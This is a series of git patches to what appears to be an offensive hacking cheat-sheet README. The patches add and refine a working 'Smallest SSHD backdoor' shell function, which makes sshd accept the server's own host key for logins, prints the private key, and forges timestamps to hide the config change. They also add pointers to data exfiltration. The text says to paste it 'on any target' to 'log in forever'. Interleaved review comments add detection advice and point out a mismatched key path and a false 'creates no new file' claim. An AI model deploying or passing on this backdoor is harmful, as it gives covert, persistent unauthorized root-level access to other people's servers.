From 3a3396e89a782e0049bd6312e6904f0e25d4580f Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 12:23:43 +0000
Subject: [PATCH 01/10] Update README.md
---
README.md | 43 ++++++++++++++++++++++++++++---------------
1 file changed, 28 insertions(+), 15 deletions(-)
diff --git a/README.md b/README.md
index 0ca692a..8a317e3 100644
--- a/README.md
+++ b/README.md
@@ -73,7 +73,7 @@ Got tricks? Join us [https://thc.org/ops](https://thc.org/ops)
1. [Backdoors](#backdoor)
1. [gs-netcat](#gsnc)
2. [sshx.io](#sshx)
- 1. [authorized_keys](#backdoor-auth-keys)
+ 1. [Smallest SSHD backdoor](#backdoor-sshd)
1. [Remote access an entire network](#backdoor-network)
1. [Smallest PHP backdoor](#php-backdoor)
1. [Smallest reverse DNS-tunnel backdoor](#reverse-dns-backdoor)
@@ -1797,23 +1797,36 @@ curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar
for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
```
-
-**6.iii. authorized_keys**
+
+**6.iii. Smallest SSHD backdoor**
-Add your ssh public key to */root/.ssh/authorized_keys*. It's the most reliable backdoor ever :>
+Adding your key to *authorized_keys* is overused 😩. Instead, use this (root only):
-* It survives reboots.
-* It even survives re-installs. Admins have been known to make a backup of authorized_keys and then put it straight back onto the newly installed system.
-* We have even seen our key being copied to other companies!
-
-Tip: Change the name at the end of the ssh public keyfile to something obscure like *backup@ubuntu* or the admin's real name:
-```
-$ cat id_rsa.pub
-ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
-[...]
-u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
-c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
+```shell
+backdoor_sshd() {
+ local K="/etc/ssh/ssh_host_ed25519_key"
+ local D="/etc/ssh/sshd_config.d"
+ local N=$(cd "${D}" || exit; shopt -s nullglob; echo *.conf)
+ [ -n "$N" ] && N="${N%%\.conf*}.conf"
+ N="${D}/${N:-50-cloud-init.conf}"
+ { [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
+ grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && return
+ /usr/sbin/sshd -V 2>&1 | grep -qE 'SSH_(9|[1-9]{1}[0-9]{1})' || EGG="Y"
+ echo -e "AuthorizedKeysFile\t${EGG:+.ssh/authorized_keys .ssh/authorized_keys2 }${K}.pub" >>"${N}" || return
+ echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
+ touch -r "$K" "$N" "$D" \
+ && declare -f ctime >/dev/null && ctime "$N" "$D"
+ systemctl restart ssh
+}
+backdoor_sshd
```
+
+How it works:
+- The SSHD host key is just a normal ed25519 key.
+- Any ed25519 key can be used to authenticate a login.
+- Configure SSHD to use the *Public Host Key* as an additional list of public keys for authentication.
+- SSHD will now check .ssh/authorized_keys and /etc/ssh/ssh_host_ed25519_key.pub for valid login keys.
+
**6.vi. Remote Access to an entire network**
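Review bot: The "How it works" list describes the mechanism but never states what an administrator should look for, even though the main persistent artifact the function leaves is the `AuthorizedKeysFile` line it appends to a file under `sshd_config.d`. The section should add that the effective directive can be checked with `sshd -T | grep -i authorizedkeysfile`, that an `AuthorizedKeysFile` value pointing outside the user's home directory (here `/etc/ssh/ssh_host_ed25519_key.pub`) is the indicator, and that file-integrity monitoring of `/etc/ssh/sshd_config.d/` and of the host-key files is the corresponding mitigation. Because the `touch -r "$K" "$N" "$D"` line copies the host key's timestamps onto the edited config and directory, such monitoring must compare content or hashes rather than mtimes. `backdoor_sshd` is complete within this hunk.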
From 41a7232987f17e2fc1ae174d25397977499fc35a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 12:31:01 +0000
Subject: [PATCH 02/10] Update SSHD authentication instructions in README
Clarify SSHD configuration for public host key authentication.
---
README.md | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 8a317e3..cf80e4a 100644
--- a/README.md
+++ b/README.md
@@ -1824,8 +1824,10 @@ backdoor_sshd
How it works:
- The SSHD host key is just a normal ed25519 key.
- Any ed25519 key can be used to authenticate a login.
-- Configure SSHD to use the *Public Host Key* as an additional list of public keys for authentication.
-- SSHD will now check .ssh/authorized_keys and /etc/ssh/ssh_host_ed25519_key.pub for valid login keys.
+- SSHD checks `~/.ssh/authorized_keys` (but this trick has been overused).
+- Instead, configure SSHD to also check `/etc/ssh/sshd_host_ed25519_key.pub` for login-authentication-keys.
+- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
+- SSHD will now check `~/.ssh/authorized_keys` _and_ `/etc/ssh/ssh_host_ed25519_key.pub` for valid login keys.
**6.vi. Remote Access to an entire network**
From 50a1c91eb8da31116bbc55ca69c6a69f7b4ad1ab Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 12:38:14 +0000
Subject: [PATCH 03/10] Update README for SSHD authentication details
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index cf80e4a..e2b4db3 100644
--- a/README.md
+++ b/README.md
@@ -1823,7 +1823,7 @@ backdoor_sshd
How it works:
- The SSHD host key is just a normal ed25519 key.
-- Any ed25519 key can be used to authenticate a login.
+- Any ed25519 key can be used to authenticate a user.
- SSHD checks `~/.ssh/authorized_keys` (but this trick has been overused).
- Instead, configure SSHD to also check `/etc/ssh/sshd_host_ed25519_key.pub` for login-authentication-keys.
- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
From 17231292a296239eeb94149dabc4057133320e8d Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 15:26:37 +0000
Subject: [PATCH 04/10] Update README.md
---
README.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/README.md b/README.md
index e2b4db3..642cdda 100644
--- a/README.md
+++ b/README.md
@@ -1811,8 +1811,7 @@ backdoor_sshd() {
N="${D}/${N:-50-cloud-init.conf}"
{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && return
- /usr/sbin/sshd -V 2>&1 | grep -qE 'SSH_(9|[1-9]{1}[0-9]{1})' || EGG="Y"
- echo -e "AuthorizedKeysFile\t${EGG:+.ssh/authorized_keys .ssh/authorized_keys2 }${K}.pub" >>"${N}" || return
+ echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
touch -r "$K" "$N" "$D" \
&& declare -f ctime >/dev/null && ctime "$N" "$D"
From 6b808a175239100db1adfb9c8643dbb124de3442 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 13 Dec 2025 16:07:13 +0000
Subject: [PATCH 05/10] Update README.md
---
README.md | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 642cdda..b403d0a 100644
--- a/README.md
+++ b/README.md
@@ -1800,7 +1800,11 @@ for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
**6.iii. Smallest SSHD backdoor**
-Adding your key to *authorized_keys* is overused 😩. Instead, use this (root only):
+- Survives `apt update`
+- Does not create any new file.
+- Does not use `authorized_keys` or PAM.
+
+Adding your key to *authorized_keys* is overused 😩. Instead, cut & paste this (as root):
```shell
backdoor_sshd() {
From 7afe2890f5f3a4d5cce513a6f399db9c97f4826a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 14 Dec 2025 14:40:37 +0000
Subject: [PATCH 06/10] Update README.md
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index b403d0a..6bef366 100644
--- a/README.md
+++ b/README.md
@@ -1804,7 +1804,7 @@ for _ in {1..10}; do [ -s .u ] && break;sleep 1;done;cat .u;rm -f .u .s;
- Does not create any new file.
- Does not use `authorized_keys` or PAM.
-Adding your key to *authorized_keys* is overused 😩. Instead, cut & paste this (as root):
+Adding your key to *authorized_keys* is overused 😩. Instead, as root, cut & paste this _once_ on any target. It will add a single line to SSHD's config and allow you to log in forever:
```shell
backdoor_sshd() {
@@ -1825,12 +1825,12 @@ backdoor_sshd
```
How it works:
-- The SSHD host key is just a normal ed25519 key.
+- The SSHD host key is just an ordinary ed25519 key.
- Any ed25519 key can be used to authenticate a user.
- SSHD checks `~/.ssh/authorized_keys` (but this trick has been overused).
- Instead, configure SSHD to also check `/etc/ssh/sshd_host_ed25519_key.pub` for login-authentication-keys.
-- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
- SSHD will now check `~/.ssh/authorized_keys` _and_ `/etc/ssh/ssh_host_ed25519_key.pub` for valid login keys.
+- Use the `/etc/ssh/sshd_host_ed25519_key` secret key to log in to the target.
**6.vi. Remote Access to an entire network**
From 264edc16e182e9b88d28bd20abc0a279bdbca2bf Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 24 Dec 2025 09:27:15 +0000
Subject: [PATCH 07/10] Update README.md
---
README.md | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index 6bef366..5b1eb6c 100644
--- a/README.md
+++ b/README.md
@@ -1808,15 +1808,16 @@ Adding your key to *authorized_keys* is overused 😩. Instead, as root, cut & p
```shell
backdoor_sshd() {
- local K="/etc/ssh/ssh_host_ed25519_key"
- local D="/etc/ssh/sshd_config.d"
+ local B="/etc/ssh"
+ local K="${B}/ssh_host_ed25519_key" D="${B}/sshd_config.d"
local N=$(cd "${D}" || exit; shopt -s nullglob; echo *.conf)
[ -n "$N" ] && N="${N%%\.conf*}.conf"
N="${D}/${N:-50-cloud-init.conf}"
{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
- grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && return
- echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
+ grep -iqm1 '^PermitRootLogin\s\+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config"
echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
+ grep -qm1 '^AuthorizedKeysFile' "$N" && { echo >&2 "WARN: Already backdoored"; return; }
+ echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
touch -r "$K" "$N" "$D" \
&& declare -f ctime >/dev/null && ctime "$N" "$D"
systemctl restart ssh
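Review bot: The key path set in the new `K` assignment, `${B}/ssh_host_ed25519_key`, does not match the file name used in the explanatory list elsewhere in this series, which writes `/etc/ssh/sshd_host_ed25519_key.pub` and `/etc/ssh/sshd_host_ed25519_key` (with an extra `d`), so a reader auditing a host from the prose would check a file that does not exist. The list should use the same path the script reads, `/etc/ssh/ssh_host_ed25519_key`, in both bullets. The function's closing brace and the `backdoor_sshd` call lie outside the hunk.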
From f184944db5e20d4bc2623ab5641da51f68d55518 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 15 Jan 2026 17:30:11 +0000
Subject: [PATCH 08/10] Update README with data upload/download instructions
Added instructions for data exfiltration methods.
---
README.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/README.md b/README.md
index 5b1eb6c..365cf88 100644
--- a/README.md
+++ b/README.md
@@ -1086,6 +1086,11 @@ nmap -p80 --script http-brute --script-args \
---
## 4. Data Upload/Download/Exfil
+
+Easiest: Type `exfil` on a [Segfault Root Server](https://thc.org/segfault)
+
+Or use curl and run your own [PHP exfil server](https://github.com/Rouji/single_php_filehost).
+
### 4.i File Encoding
From cb8806281e88120b8981ced1884d11519ca6351a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 20 Jan 2026 21:17:48 +0000
Subject: [PATCH 09/10] Update README.md
---
README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 365cf88..4d33ddb 100644
--- a/README.md
+++ b/README.md
@@ -1815,9 +1815,10 @@ Adding your key to *authorized_keys* is overused 😩. Instead, as root, cut & p
backdoor_sshd() {
local B="/etc/ssh"
local K="${B}/ssh_host_ed25519_key" D="${B}/sshd_config.d"
- local N=$(cd "${D}" || exit; shopt -s nullglob; echo *.conf)
+ local N=$(cd "${D}" 2>/dev/null|| exit; shopt -s nullglob; echo *.conf)
[ -n "$N" ] && N="${N%%\.conf*}.conf"
N="${D}/${N:-50-cloud-init.conf}"
+ [ ! -d "${D}" ] && N="${B}/sshd_config"
{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
grep -iqm1 '^PermitRootLogin\s\+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config"
echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
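Review bot: The new fallback `[ ! -d "${D}" ] && N="${B}/sshd_config"` only covers a missing `sshd_config.d`; when the directory exists but holds no `*.conf`, `N` still resolves to `${D}/50-cloud-init.conf` two lines above and the later `>>` redirect creates that file, which contradicts the bullet "Does not create any new file." added to this section in an earlier patch of the series. That bullet should be qualified to say a new drop-in file is created when the directory is empty. From a detection standpoint, a newly appearing `.conf` in `/etc/ssh/sshd_config.d/` containing `AuthorizedKeysFile` is exactly the artifact to alert on. `backdoor_sshd` continues past the end of this hunk.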
From 81833af0f09a216c16b5df3da1576b29e6331e1c Mon Sep 17 00:00:00 2001
From: rootTHC <57636391+rootTHC@users.noreply.github.com>
Date: Mon, 16 Feb 2026 14:09:59 +0000
Subject: [PATCH 10/10] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 4d33ddb..0346e9c 100644
--- a/README.md
+++ b/README.md
@@ -1822,7 +1822,7 @@ backdoor_sshd() {
{ [ ! -f "$K" ] || [ ! -f "$K".pub ]; } && return
grep -iqm1 '^PermitRootLogin\s\+no' "${B}/sshd_config" && echo >&2 "WARN: PermitRootLogin blocking in sshd_config"
echo -e "\e[0;31mYour id_ed25519 to log in to this server as any user:\e[0;33m\n$(cat "${K}")\e[0m"
- grep -qm1 '^AuthorizedKeysFile' "$N" && { echo >&2 "WARN: Already backdoored"; return; }
+ grep -qm1 '^AuthorizedKeysFile' "$N" 2>/dev/null && { echo >&2 "WARN: Already backdoored"; return; }
echo -e "AuthorizedKeysFile\t.ssh/authorized_keys .ssh/authorized_keys2 ${K}.pub" >>"${N}" || return
touch -r "$K" "$N" "$D" \
&& declare -f ctime >/dev/null && ctime "$N" "$D"